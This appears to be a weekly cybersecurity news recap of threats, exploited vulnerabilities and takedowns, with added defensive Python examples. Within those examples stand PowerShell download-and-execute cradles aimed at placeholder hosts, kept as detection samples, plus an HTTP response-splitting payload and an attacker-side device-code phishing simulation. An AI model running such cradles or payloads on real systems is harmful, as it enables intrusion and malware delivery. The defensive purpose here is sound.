Welcome to this week’s Cybersecurity Newsletter, where we bring you the latest updates and key insights from the ever-changing world of cybersecurity.
In today’s fast-paced digital environment, staying informed is crucial. Our goal is to provide you with relevant information to help you navigate the challenges of this dynamic field effectively.
This edition highlights emerging threats and the shifting dynamics of digital defenses. Key topics include advanced ransomware attacks and the increasing influence of state-sponsored cyber activities on global security.
We offer an in-depth analysis of these evolving threats, along with actionable strategies to bolster your organization’s defenses. Additionally, we examine how cutting-edge technologies like artificial intelligence (AI), machine learning (ML), and quantum computing are reshaping cybersecurity—both as tools for protection and as potential vulnerabilities exploited by adversaries.
Examples covered include AI-powered phishing schemes, ML-enhanced malware, and quantum computing’s potential to break encryption. We also explore how industries are addressing critical cybersecurity challenges, such as securing remote work environments and mitigating vulnerabilities in Internet of Things (IoT) devices.
These issues underscore the importance of proactive measures to protect digital infrastructure. We’ll also review recent regulatory developments, such as the European Union’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA), which set the benchmarks for data privacy and security that your compliance strategy has to keep up with.
Stay tuned each week as we dive into these complex topics and beyond, equipping you with the knowledge needed to stay ahead in the ever-evolving cybersecurity landscape.
Threats
1. Malware Exploits Application Layer for Stealthy Attacks
Analysis of over 1 million malware samples reveals that attackers are increasingly leveraging the Application Layer of the OSI model to conduct stealthy Command-and-Control (C2) operations. By abusing trusted protocols like HTTP/S, DNS, and SMTP, adversaries embed malicious activities within legitimate traffic, evading traditional detection mechanisms. Advanced tools like deep packet inspection and behavioral monitoring are critical to counter these threats.
Read more: https://cybersecuritynews.com/malware-samples-analysis-application-layer/
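As an added illustration (not part of the original article or the analysis it reports), the heuristics below run over a constructed DNS resolver log and flag a domain whose leftmost labels look like encoded data: long, high-entropy labels, many distinct subdomains, and a preference for record types that carry large answers. The log lines, the `exfil-demo.invalid` domain and the thresholds are all made up for the example.

```python
import math
from collections import defaultdict

# Constructed sample resolver log for this example (not a real capture).
# One query per line: <timestamp> <client-ip> <qtype> <qname>
SAMPLE_DNS_LOG = """\
2025-02-14T09:00:01Z 10.0.0.12 A www.example.com
2025-02-14T09:00:02Z 10.0.0.12 A cdn.example.net
2025-02-14T09:00:03Z 10.0.0.12 AAAA mail.example.com
2025-02-14T09:01:00Z 10.0.0.44 TXT 7a3f9c1e2b4d6e8f0a1b2c3d4e5f6a7b.exfil-demo.invalid
2025-02-14T09:01:01Z 10.0.0.44 TXT 8b4e0d2f3c5a7f9e1b2c3d4e5f6a7b8c.exfil-demo.invalid
2025-02-14T09:01:02Z 10.0.0.44 TXT 9c5f1e3a4d6b8e0f2c3d4e5f6a7b8c9d.exfil-demo.invalid
2025-02-14T09:01:03Z 10.0.0.44 TXT 0d6a2f4b5e7c9f1a3d4e5f6a7b8c9d0e.exfil-demo.invalid
2025-02-14T09:01:04Z 10.0.0.44 TXT 1e7b3a5c6f8d0a2b4e5f6a7b8c9d0e1f.exfil-demo.invalid
2025-02-14T09:01:05Z 10.0.0.44 TXT 2f8c4b6d7a9e1b3c5f6a7b8c9d0e1f2a.exfil-demo.invalid
2025-02-14T09:02:00Z 10.0.0.12 A login.example.com
2025-02-14T09:02:01Z 10.0.0.12 A www.example.com
"""


def shannon_entropy(text: str) -> float:
    """Bits per character: random hex sits near 4.0, dictionary-word labels near 2 to 3."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def split_qname(qname: str):
    """Return (leftmost_label, registered_domain).
    Simplification for the example: the last two labels are taken as the
    registrable domain. Production code should consult the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None, ".".join(labels)
    return labels[0], ".".join(labels[-2:])


def flag_dns_tunneling(log_text: str, min_queries: int = 5, min_label_len: int = 20,
                       min_entropy: float = 3.0, bulky_ratio_hint: float = 0.5) -> dict:
    """Group queries by registered domain; flag domains whose leftmost labels
    look like encoded data. Returns {domain: [reasons]}."""
    stats = defaultdict(lambda: {"queries": 0, "bulky": 0, "labels": []})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of failing the whole run
        _ts, _client, qtype, qname = parts
        label, domain = split_qname(qname)
        entry = stats[domain]
        entry["queries"] += 1
        if qtype.upper() in ("TXT", "NULL", "CNAME"):
            entry["bulky"] += 1  # record types that can carry large answers back to the client
        if label is not None:
            entry["labels"].append(label)

    flagged = {}
    for domain, entry in stats.items():
        labels = entry["labels"]
        if entry["queries"] < min_queries or not labels:
            continue
        avg_len = sum(len(l) for l in labels) / len(labels)
        avg_ent = sum(shannon_entropy(l) for l in labels) / len(labels)
        if avg_len < min_label_len or avg_ent < min_entropy:
            continue
        reasons = [f"average leftmost label length {avg_len:.1f}",
                   f"average leftmost label entropy {avg_ent:.2f} bits/char",
                   f"{len(set(labels))} distinct subdomains in {entry['queries']} queries"]
        if entry["bulky"] / entry["queries"] >= bulky_ratio_hint:
            reasons.append("mostly TXT/NULL/CNAME lookups")
        flagged[domain] = reasons
    return flagged
```

The thresholds are a starting point to tune against your own baseline; CDNs and some antivirus products also issue long, high-entropy lookups, so treat a hit as a hunting lead rather than a verdict.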
2. Rise in LLMjacking: DeepSeek-V3 Targeted
The release of DeepSeek-V3 has led to a surge in LLMjacking attacks, in which stolen cloud credentials and API keys are used to run workloads against hosted large language models (LLMs) at the victim’s expense. Cybercriminals resell that access through reverse-proxy services, leaving the account owner with the bill. Organizations are advised to keep API keys out of code and public repositories, rotate them regularly, and alert on unusual model usage or spend.
Read more: https://cybersecuritynews.com/llm-hijackers-deepseek-v3-model/
3. NetSupport RAT Abused for Full System Control
The NetSupport Remote Access Trojan (RAT), a legitimate remote-administration tool repurposed by attackers, is being delivered through the “ClickFix” technique: a fake error or verification page tells the user to copy a command to the clipboard and paste it into the Windows Run dialog, which executes a malicious PowerShell one-liner. The RAT then gives attackers full control over the system, a foothold that has led to ransomware deployment and data breaches. Organizations should deploy endpoint detection tools, enable PowerShell script block logging, and restrict unauthorized software installations.
Read more: https://cybersecuritynews.com/netsupport-rat-grant-attackers-full-access/
4. Valentine’s Day-Themed Domains Used for Cyberattacks
Threat actors are exploiting newly registered Valentine’s Day-themed domains to launch phishing and malware campaigns. A 39% rise in such domains has been observed, with one in eight being malicious or suspicious. Users should verify domain legitimacy and avoid clicking on unsolicited links during seasonal events.
Read more: https://cybersecuritynews.com/hackers-newly-registering-valentines-day-themed-domains/
5. Remote Desktop Manager Vulnerabilities Expose Encrypted Communications
Critical vulnerabilities in Devolutions’ Remote Desktop Manager (RDM) allow attackers to intercept encrypted communications through man-in-the-middle (MITM) attacks. Users are urged to upgrade to patched versions immediately to mitigate these risks.
Read more: https://cybersecuritynews.com/rdm-vulnerabilities-intercept-encrypted-communications/
6. Phishing Campaign Exploits Webflow CDN and Fake CAPTCHAs
A sophisticated phishing campaign abuses Webflow’s CDN and fake CAPTCHA pages to steal sensitive financial information. Victims are lured via search engine results into providing personal details under the guise of subscription services. Caution is advised when interacting with unfamiliar websites or documents found online.
Read more: https://cybersecuritynews.com/new-phishing-attacks-abuses-webflow-cdn-captchas/
7. Winnti Hackers Target Japanese Organizations
The China-based Winnti Group has launched a campaign called “RevivalStone,” targeting Japanese organizations in the manufacturing and energy sectors with advanced malware and WebShells. The attack highlights the need for robust cybersecurity defenses against state-sponsored threats.
Read more: https://cybersecuritynews.com/winnti-hackers-attacking-japanese-organizations/
8. Device Code Phishing Captures Authentication Tokens
Storm-2372 attackers abuse the OAuth device code flow: the victim receives a lure (typically a meeting invitation) containing a device code and is asked to enter it on the genuine Microsoft sign-in page. Because the victim authenticates legitimately, including completing MFA, the identity provider issues access and refresh tokens to the attacker’s session without the attacker ever handling a password. MFA alone therefore does not stop this attack. Organizations should block the device code flow with Conditional Access where it is not needed, revoke refresh tokens for affected users, and train users to treat unexpected device-code prompts as phishing.
Read more: https://cybersecuritynews.com/new-device-code-phishing-attack-exploit-device-code-authentication/
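To show why the victim’s MFA does not help, here is an added simulation of the OAuth 2.0 device authorization grant (RFC 8628) with both parties’ messages. It is example code written for this recap, not Microsoft’s implementation or the attackers’ tooling; the hostnames, client identifier and user names are placeholders.

```python
import secrets


class AuthorizationServer:
    """Minimal model of the OAuth 2.0 device authorization grant (RFC 8628).
    Illustration only, not Entra ID's implementation; URIs and IDs are placeholders."""

    VERIFICATION_URI = "https://login.example.invalid/device"

    def __init__(self, allow_device_code: bool = True):
        # The policy knob: the Conditional Access equivalent of blocking the flow.
        self.allow_device_code = allow_device_code
        self._pending = {}  # device_code -> {"user_code", "client_id", "approved_by"}

    def device_authorization(self, client_id: str) -> dict:
        """Step 1: the client (here, the attacker's script) requests a code pair."""
        if not self.allow_device_code:
            raise PermissionError("device code flow is blocked by policy")
        device_code = secrets.token_hex(16)       # secret, never leaves the client
        user_code = secrets.token_hex(4).upper()  # short code the user types in
        self._pending[device_code] = {"user_code": user_code, "client_id": client_id,
                                      "approved_by": None}
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": self.VERIFICATION_URI}

    def user_approves(self, user_code: str, user: str, mfa_passed: bool) -> bool:
        """Step 2: the user signs in on the genuine verification page, completes
        MFA, and types the user_code they were sent. From the identity
        provider's point of view nothing here looks like phishing."""
        if not mfa_passed:
            return False
        for entry in self._pending.values():
            if entry["user_code"] == user_code and entry["approved_by"] is None:
                entry["approved_by"] = user
                return True
        return False

    def token(self, device_code: str) -> dict:
        """Step 3: whoever holds device_code polls and receives the tokens."""
        entry = self._pending.get(device_code)
        if entry is None:
            return {"error": "invalid_grant"}
        if entry["approved_by"] is None:
            return {"error": "authorization_pending"}
        return {"access_token": secrets.token_urlsafe(24),
                "refresh_token": secrets.token_urlsafe(24),
                "subject": entry["approved_by"],
                "client_id": entry["client_id"]}


def run_device_code_phish(server: AuthorizationServer,
                          victim: str = "alice@contoso.invalid") -> dict:
    """The attacker's side of a Storm-2372-style lure, as a simulation:
    request codes, get the victim to enter user_code, poll for the token."""
    codes = server.device_authorization(client_id="client-chosen-by-attacker")
    # Lure text the attacker sends: "Join the meeting: open {verification_uri}
    # and enter code {user_code}". Until the victim acts, polling is pending.
    first_poll = server.token(codes["device_code"])
    # The victim does exactly what the real sign-in page asks, MFA included.
    approved = server.user_approves(codes["user_code"], user=victim, mfa_passed=True)
    return {"pending_before_victim": first_poll, "approved": approved,
            "token": server.token(codes["device_code"])}


def run_with_flow_blocked() -> str:
    """Mitigation: block the flow for users and apps that have no need for it."""
    server = AuthorizationServer(allow_device_code=False)
    try:
        run_device_code_phish(server)
    except PermissionError as exc:
        return str(exc)
    return "flow was not blocked"
```

The token in the result is bound to the victim’s identity but delivered to the party holding `device_code`, which is exactly what makes the attack password-less from the attacker’s side; in a real tenant, also revoke refresh tokens for any user who entered a code they did not request.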
9. Astaroth 2FA Phishing Kit Bypasses Security Measures
The Astaroth phishing kit targets Gmail, Yahoo, and Office 365 users with an adversary-in-the-middle reverse proxy: the fake login page relays the victim’s traffic to the real service and captures the password, the two-factor authentication (2FA) code and the resulting session cookie in real time, so the attacker is logged in as soon as the victim is. Because the code is relayed live, authenticator apps and SMS are both defeated; only phishing-resistant MFA such as FIDO2 security keys or passkeys, whose credentials are bound to the legitimate origin, blocks this class of kit. User vigilance about the URL in the address bar remains the last line of defense.
Read more: https://cybersecuritynews.com/new-astaroth-2fa-phishing-kit-targeting-gmail/
10. Fake BSOD Delivered via Malicious Python Script
A Python script uses the tkinter library to display a full-screen fake “Blue Screen of Death” (BSOD) as an anti-analysis tactic, stalling the user or analyst while looking harmless enough to draw very few antivirus detections. Behavioral analysis, rather than signatures, is what identifies such scripts early.
Read more: https://cybersecuritynews.com/fake-bsod-delivered/
Cyber Attack News
1. Critical KerioControl Firewall Vulnerability Exposes Thousands of Systems
A severe vulnerability (CVE-2024-52875) in GFI KerioControl firewalls is a CRLF injection (HTTP response splitting) flaw in unauthenticated URI paths: it can be turned into reflected cross-site scripting and, if an administrator is lured into clicking a crafted link, into one-click remote code execution (RCE) on the appliance. Over 12,000 internet-exposed instances remain unpatched, posing risks of data breaches and ransomware attacks. Organizations are urged to restrict access to the web interface, monitor for unusual activity, and apply updates promptly.
Read more: https://cybersecuritynews.com/keriocontrol-firewall-1-click-rce/
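The bug class behind this advisory, an unsanitized parameter reflected into a redirect header, is easy to see in a few lines. The following added example (written for this recap, not GFI’s code) builds the raw response a vulnerable handler would emit, parses it the way a browser or proxy would so the smuggled second response becomes visible, and shows the check that closes the hole. The hostname is a placeholder.

```python
import re
from urllib.parse import urlsplit

ALLOWED_HOSTS = ("fw.example.invalid",)  # placeholder for the appliance's own hostname
BAD_REQUEST = b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"


def _build_302(dest: str) -> bytes:
    """Serialize a redirect exactly as it would go on the wire."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {dest}\r\n"
            "Content-Length: 0\r\n"
            "\r\n").encode("latin-1")


def redirect_vulnerable(dest: str) -> bytes:
    """Illustrative handler that reflects a query parameter straight into the
    Location header. A CR/LF inside dest ends the header block early."""
    return _build_302(dest)


def redirect_hardened(dest: str) -> bytes:
    """Validate before the value reaches a header: no control characters (the
    CRLF injection itself), and no target other than a local path or this
    appliance's own hostname (also blocks open redirects)."""
    if re.search(r"[\x00-\x1f\x7f\\]", dest):
        return BAD_REQUEST
    parts = urlsplit(dest)
    if parts.scheme or parts.netloc:  # absolute URL or protocol-relative "//host"
        if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
            return BAD_REQUEST
    elif not dest.startswith("/"):
        return BAD_REQUEST
    return _build_302(dest)


def parse_responses(raw: bytes) -> list:
    """Parse a byte stream as consecutive HTTP/1.1 responses, the way a proxy
    or browser connection would, so an injected second response shows up."""
    responses, pos = [], 0
    while pos < len(raw):
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break
        lines = raw[pos:head_end].decode("latin-1").split("\r\n")
        if not lines[0].startswith("HTTP/"):
            break  # leftover bytes that are not a status line
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0") or 0)
        body_start = head_end + 4
        responses.append({"status": lines[0], "headers": headers,
                          "body": raw[body_start:body_start + length].decode("latin-1")})
        pos = body_start + length
    return responses


INJECTED_BODY = "<h1>injected</h1>"
# Attacker-controlled dest: terminates the 302, then smuggles a complete 200
# response whose body the browser renders in the appliance's origin.
SPLITTING_PAYLOAD = ("/\r\nContent-Length: 0\r\n\r\n"
                     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                     f"Content-Length: {len(INJECTED_BODY)}\r\n\r\n{INJECTED_BODY}")
```

Most web frameworks reject control characters in header values for you; the vulnerable path is usually hand-rolled header output in an appliance’s CGI layer, which is why the check belongs at the point where untrusted input meets the header.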
2. SonicWall Firewalls Exploited to Hijack SSL VPN Sessions
Attackers are exploiting a critical flaw (CVE-2024-53704) in SonicWall firewalls to bypass SSL VPN authentication and hijack active SSL VPN sessions. The vulnerability stems from improper validation of the Base64-encoded session cookie: a crafted cookie is accepted as a valid session without any credentials. SonicWall has released patches; organizations are advised to update immediately and, until then, limit SSL VPN exposure to trusted sources.
Read more: https://cybersecuritynews.com/unpatched-sonicwall-firewalls-vulnerability/
3. Hackers Use Social Engineering to Exploit PowerShell
North Korean hacking group Emerald Sleet is tricking victims into running PowerShell commands as administrators via spear-phishing emails. The attack installs malicious tools for espionage and data theft. Microsoft advises training users to recognize phishing attempts and deploying advanced anti-phishing solutions.
Read more: https://cybersecuritynews.com/hackers-trick-you-to-run-powershell-as-admin/
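Both this item and the NetSupport/ClickFix item in the Threats section end the same way: the victim pastes a PowerShell command into the Run dialog or an elevated prompt. With Script Block Logging enabled, that command lands in Event ID 4104 as ScriptBlockText, and a handful of patterns catch most lures. The triage function below is an added example written for this recap (not Microsoft’s or any vendor’s detection logic); the sample script blocks are constructed and use RFC 5737 documentation addresses.

```python
import base64
import re

# Constructed ScriptBlockText values (the payload field of Event ID 4104),
# written for this example; none is real telemetry.
SAMPLE_SCRIPT_BLOCKS = [
    r"Get-ChildItem C:\Users\alice\Documents | Measure-Object",
    'powershell -w hidden -nop -ep bypass -c "iwr https://captcha-check.invalid/fix.ps1 | iex"',
    "powershell -EncodedCommand " + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
        .encode("utf-16-le")).decode(),
    "mshta https://captcha-check.invalid/verify.hta",
    "Start-Process -Verb RunAs powershell.exe -ArgumentList '-nop -c \"curl.exe -o $env:TEMP\\client32.exe http://203.0.113.9/client32.exe\"'",
]

PATTERNS = {
    "download-cradle": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|DownloadString|"
        r"DownloadFile|WebClient|Start-BitsTransfer)\b", re.I),
    "inline-execution": re.compile(
        r"\b(iex|Invoke-Expression|Start-Process|mshta|rundll32|regsvr32)\b", re.I),
    "hidden-or-bypass": re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-ExecutionPolicy\s+bypass", re.I),
    "elevation": re.compile(r"-Verb\s+RunAs\b", re.I),
    "remote-url": re.compile(r"https?://", re.I),
}
# -EncodedCommand and its short forms take base64 of UTF-16LE text.
ENCODED = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str):
    """Return the decoded -EncodedCommand payload, or None if there is none
    or it does not decode cleanly."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_script_block(text: str) -> dict:
    """Score one script block. The decoded payload is matched as well, so
    encoding does not hide the download cradle."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    reasons = [name for name, rx in PATTERNS.items() if rx.search(haystack)]
    if decoded is not None:
        reasons.append("encoded-command")
    return {"score": len(reasons), "reasons": reasons, "decoded": decoded,
            "verdict": "suspicious" if len(reasons) >= 2 else "benign"}


def triage(blocks) -> list:
    """Return (block, analysis) pairs judged suspicious, highest score first."""
    results = [(b, analyze_script_block(b)) for b in blocks]
    return sorted((r for r in results if r[1]["verdict"] == "suspicious"),
                  key=lambda r: -r[1]["score"])
```

A single hit (an admin legitimately using `iwr`) is noise; two or more independent indicators on one block, especially a download cradle plus hidden-window or elevation flags, is where ClickFix lures separate from routine administration. Pair the rule with process-creation telemetry showing `explorer.exe` spawning the PowerShell process, which is the Run-dialog signature.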
4. $8.5M Stolen in zkLend DeFi Hack
The Starknet-based DeFi lending protocol zkLend (Starknet is an Ethereum Layer 2) suffered a major breach, losing roughly 3,300 ETH ($8.5 million). The project has offered the attacker a 10% whitehat bounty for returning the funds and says it will escalate the matter to law enforcement if there is no response. Users are reminded of the risks associated with DeFi platforms.
Read more: https://cybersecuritynews.com/zklend-hacked/
5. Apple Silicon’s KASLR Security Bypassed by SysBumps Attack
Researchers have bypassed Apple Silicon’s Kernel Address Space Layout Randomization (KASLR) with SysBumps, which uses speculative execution during system calls as a side channel to infer kernel addresses on macOS. Defeating KASLR removes a prerequisite for exploiting kernel memory-corruption bugs and highlights the limits of the kernel isolation on Apple’s M-series processors. Apple is investigating mitigation strategies.
Read more: https://cybersecuritynews.com/kaslr-exploited-apple-silicon/
6. Pyramid Pentesting Tool Abused for Stealthy C2 Communications
Hackers are using the open-source Pyramid pentesting tool to establish stealthy command-and-control (C2) channels, bypassing endpoint detection systems. Pyramid’s lightweight HTTP/S server capabilities make it a favored choice for malicious actors seeking to evade detection during post-exploitation activities.
Read more: https://cybersecuritynews.com/hackers-using-pyramid-pentesting-tool/
7. Malware Exploits Microsoft Outlook via Graph API
A sophisticated malware campaign uses Microsoft Outlook mailboxes as a command-and-control channel: the FINALDRAFT backdoor, delivered by the PATHLOADER loader, reads and writes mail drafts through the Microsoft Graph API so that its traffic blends in with legitimate Office 365 usage, supporting espionage and data exfiltration. Organizations should monitor Graph API usage for unusual application consents and draft activity and implement stringent access controls to counter such threats.
Read more: https://cybersecuritynews.com/new-malware-exploiting-outlook-as-a-communication-channel/
8. PAN-OS Authentication Bypass Actively Exploited
Palo Alto Networks has patched a high-severity authentication bypass vulnerability (CVE-2025-0108) in PAN-OS that attackers are actively exploiting. An unauthenticated attacker with network access to the management web interface can bypass authentication and invoke certain PHP scripts. Organizations must update affected versions immediately and restrict management interface access to trusted internal IP addresses to reduce exposure.
Read more: https://cybersecuritynews.com/pan-os-authentication-bypass-exploited/
9. Salt Typhoon Hackers Exploit Cisco Devices Globally
The Chinese state-sponsored group Salt Typhoon compromised over 1,000 unpatched Cisco IOS XE devices by chaining a web UI authentication bypass (CVE-2023-20198) with a privilege escalation to root (CVE-2023-20273), both patched in 2023. The victims include telecommunications providers and universities, underscoring the need for prompt patching and for keeping device management interfaces off the internet.
Read more: https://cybersecuritynews.com/salt-typhoon-hackers-exploited-1000-cisco-devices/
Vulnerability News
1. Microsoft SharePoint Connector Vulnerability (CVE-2024-49070)
A critical SSRF vulnerability in Microsoft Power Platform’s SharePoint connector allowed attackers to impersonate users and access sensitive data. Exploitation required specific user roles, but Microsoft has patched the flaw. Organizations are advised to apply updates and monitor for suspicious activity.
Read more: https://cybersecuritynews.com/microsoft-sharepoint-connector-vulnerability/
2. Apple Zero-Day Vulnerability (CVE-2025-24200)
Apple released iOS and iPadOS 18.3.1 to address a zero-day vulnerability targeting USB Restricted Mode. This flaw allowed physical attackers to disable the feature on locked devices, posing risks to targeted individuals. Immediate updates are recommended for all eligible devices.
Read more: https://cybersecuritynews.com/apple-0-day-vulnerability-exploited-in-extremely-sophisticated-attacks-in-the-wild/
3. Progress LoadMaster Security Vulnerabilities
Multiple critical vulnerabilities in Progress LoadMaster products could allow attackers to execute arbitrary commands or access sensitive files. No reports of exploitation have surfaced, but users should update to the latest firmware immediately.
Read more: https://cybersecuritynews.com/progress-loadmaster-security-vulnerability/
4. SAP Patches 19 Vulnerabilities
SAP released updates addressing high-severity vulnerabilities, including XSS, authentication bypasses, and authorization flaws across platforms like NetWeaver and BusinessObjects. Timely patching is crucial to mitigate exploitation risks.
Read more: https://cybersecuritynews.com/19-vulnerabilities-across-multiple-products-patched/
5. Ivanti CSA RCE Vulnerability (CVE-2024-47908)
Ivanti patched a critical OS command injection vulnerability in the admin web console of its Cloud Services Appliance (CSA), which could allow an authenticated attacker with administrator privileges to achieve remote code execution. Users are urged to upgrade to version 5.0.5 immediately.
Read more: https://cybersecuritynews.com/ivanti-csa-vulnerability-rce/
6. Fortinet FortiOS DoS and RCE Flaws
Fortinet addressed vulnerabilities in its VPN software that could lead to denial-of-service attacks or remote code execution due to outdated library usage. Updated FortiOS versions are now available, and immediate patching is advised.
Read more: https://cybersecuritynews.com/fortios-vulnerabilities-allowing-dos-rce/
7. OpenSSL MitM Vulnerability (CVE-2024-12797)
A high-severity flaw in OpenSSL 3.2, 3.3 and 3.4 could enable man-in-the-middle attacks on TLS clients that authenticate servers with raw public keys (RPKs, RFC 7250): with SSL_VERIFY_PEER set, the handshake does not abort when the server’s key fails to match the expected one, so the client can proceed against an impostor. RPKs are disabled by default, which limits exposure. Administrators must update to OpenSSL 3.4.1, 3.3.2 or 3.2.4 promptly.
Read more: https://cybersecuritynews.com/openssl-vulnerability/
8. AWS IAM Username Enumeration Flaws
Two vulnerabilities in the AWS IAM console login flow allowed attackers to enumerate valid usernames: one through the MFA prompt, which appears only for existing MFA-enabled users, and one through response-timing discrepancies between known and unknown accounts. AWS has patched one issue and classified the other as an accepted risk. Enumeration feeds password spraying, so organizations should enable MFA on every IAM user, prefer federated identities over long-lived IAM users, and monitor CloudTrail ConsoleLogin events for failures spread across many usernames.
Read more: https://cybersecuritynews.com/aws-iam-vulnerabilities/
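Both oracles described above are generic to any login flow. The added example below (constructed for this recap, not AWS code) builds a small login back end with a leaky and a hardened path, instrumented so the timing difference appears as a deterministic difference in work performed, and shows how an attacker’s enumeration probe succeeds against one and fails against the other.

```python
import hashlib
import hmac
import os


class LoginService:
    """Constructed login back end for the example (not AWS code). It counts
    expensive password verifications so that a timing side channel shows up
    as a difference in work done rather than a flaky wall-clock measurement."""

    def __init__(self):
        self.hash_ops = 0
        self._salt = os.urandom(16)  # one salt for brevity; use per-user salts in practice
        self._users = {
            "alice": self._hash("correct horse battery staple"),
            "bob": self._hash("bobs-password"),
        }
        self._mfa_enrolled = {"alice"}
        # Verified against whenever the username is unknown, so unknown and
        # known usernames cost the same amount of work.
        self._decoy_hash = self._hash(os.urandom(16).hex())

    def _hash(self, password: str) -> bytes:
        self.hash_ops += 1
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self._salt, 20_000)

    def login_leaky(self, username: str, password: str) -> str:
        """Two oracles: a distinct message for unknown users, and an early
        return that skips the hash, so unknown users are answered faster."""
        if username not in self._users:
            return "unknown user"
        if not hmac.compare_digest(self._hash(password), self._users[username]):
            return "wrong password"
        return "mfa required" if username in self._mfa_enrolled else "ok"

    def login_hardened(self, username: str, password: str) -> str:
        """Same work and same message on every failure path. Whether MFA is
        enrolled is only revealed once the password has verified."""
        stored = self._users.get(username, self._decoy_hash)
        password_ok = hmac.compare_digest(self._hash(password), stored)
        if not password_ok or username not in self._users:
            return "invalid credentials"
        return "mfa required" if username in self._mfa_enrolled else "ok"


def enumerate_by_response(login_fn, candidates, probe_password="not-the-password"):
    """Attacker's view: any response that differs from an obviously bogus
    username's response marks the candidate as a valid account."""
    baseline = login_fn("zz-no-such-user-zz", probe_password)
    return [c for c in candidates if login_fn(c, probe_password) != baseline]


def work_for(service: LoginService, login_fn, username: str) -> int:
    """Expensive operations one probe of `username` triggers, standing in for
    the response time an attacker would measure over the network."""
    before = service.hash_ops
    login_fn(username, "not-the-password")
    return service.hash_ops - before
```

The hardened path still has to ask for a second factor at some point; the defense is that it does so only after a correct password, so a username alone no longer tells the attacker anything, and an unknown account costs the server the same PBKDF2 call as a real one.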
9. PAN-OS Authentication Bypass (CVE-2025-0108)
Palo Alto Networks disclosed a vulnerability in PAN-OS that allowed unauthenticated attackers to bypass web interface authentication under specific configurations. Organizations should upgrade affected systems and restrict interface access to internal IPs only.
Read more: https://cybersecuritynews.com/pan-os-vulnerability-web-interface-authentication/
10. Chrome Use-After-Free Vulnerability (CVE-2025-0995)
Google released an urgent Chrome update addressing critical vulnerabilities, including a use-after-free flaw in the V8 JavaScript engine that could enable remote code execution via crafted HTML pages. Users should update Chrome immediately to secure their browsers against potential exploits.
Read more: https://cybersecuritynews.com/chrome-use-after-free-vulnerability-v8/
11. Firewall Authentication Bypass Issue
A newly discovered firewall vulnerability allows attackers to bypass authentication mechanisms under certain conditions, compromising network security systems’ integrity and confidentiality. Immediate updates are recommended for affected devices.
Read more: https://cybersecuritynews.com/firewall-authentication-bypass-vulnerability/
Other Cyber News
1. GitHub Copilot Introduces Agent Mode for Autonomous Coding
GitHub has added an Agent Mode to its AI-powered coding assistant, GitHub Copilot. In this mode Copilot carries out multi-step coding tasks on its own, such as debugging, designing database schemas, and implementing APIs, iterating on its own output until the task is done. Available in preview for Visual Studio Code Insiders, Agent Mode combines the model’s capabilities with workflow automation; as with any agent that edits code autonomously, its changes need review before they are merged.
Additionally, GitHub announced the general availability of Copilot Edits, which allows multi-file changes using natural language prompts. A sneak peek into Project Padawan also revealed plans for autonomous software engineering agents capable of automating tasks like generating pull requests and refactoring codebases.
Read more: GitHub Copilot’s New Agent Mode
2. Major Takedown of 8Base Ransomware Group
In a significant breakthrough, Thai authorities have arrested four European nationals linked to the notorious 8Base ransomware group. The operation, codenamed “Phobos Aetor,” led to the seizure of the group’s dark web infrastructure. The suspects are accused of deploying Phobos ransomware, targeting over 1,000 victims globally and causing damages exceeding $16 million.
The group used a “double extortion” strategy, encrypting data while threatening to leak it if ransoms were not paid. This takedown highlights growing international cooperation in combating ransomware threats.
Read more: 8Base Ransomware Dark Web Site Seized
3. Google Chrome’s Enhanced Safe Browsing Protects Over 1 Billion Users
Google Chrome’s Enhanced Protection mode now safeguards more than 1 billion users against phishing and scams. This advanced security feature offers twice the protection compared to standard modes by leveraging AI and machine learning to detect malicious websites and downloads in real time.
Enhanced Protection also conducts over 300,000 deep scans monthly to identify malware hidden in suspicious files, ensuring robust online safety while prioritizing user privacy.
Read more: Google Chrome’s Safe Browsing
4. Windows 11 Compression Formats Pose Security Risks
Microsoft’s Windows 11 update KB5031455 added native support for 11 additional archive formats such as RAR and 7z by bundling the open-source libarchive library. That integration also imported weaknesses in the library’s format parsers, including two remote code execution (RCE) flaws (CVE-2024-20696 and CVE-2024-20697) that Microsoft has since patched.
These vulnerabilities stem from improper bounds checking during decompression, allowing a crafted archive to execute arbitrary code or manipulate files on an affected system when it is opened. Users are advised to keep Windows up to date and to exercise caution when handling archives from untrusted sources.
Read more: Windows 11’s New Compression Formats Pose Risks
The post Cybersecurity Weekly Recap: Latest on Attacks, Vulnerabilities, & Data Breaches appeared first on Cyber Security News.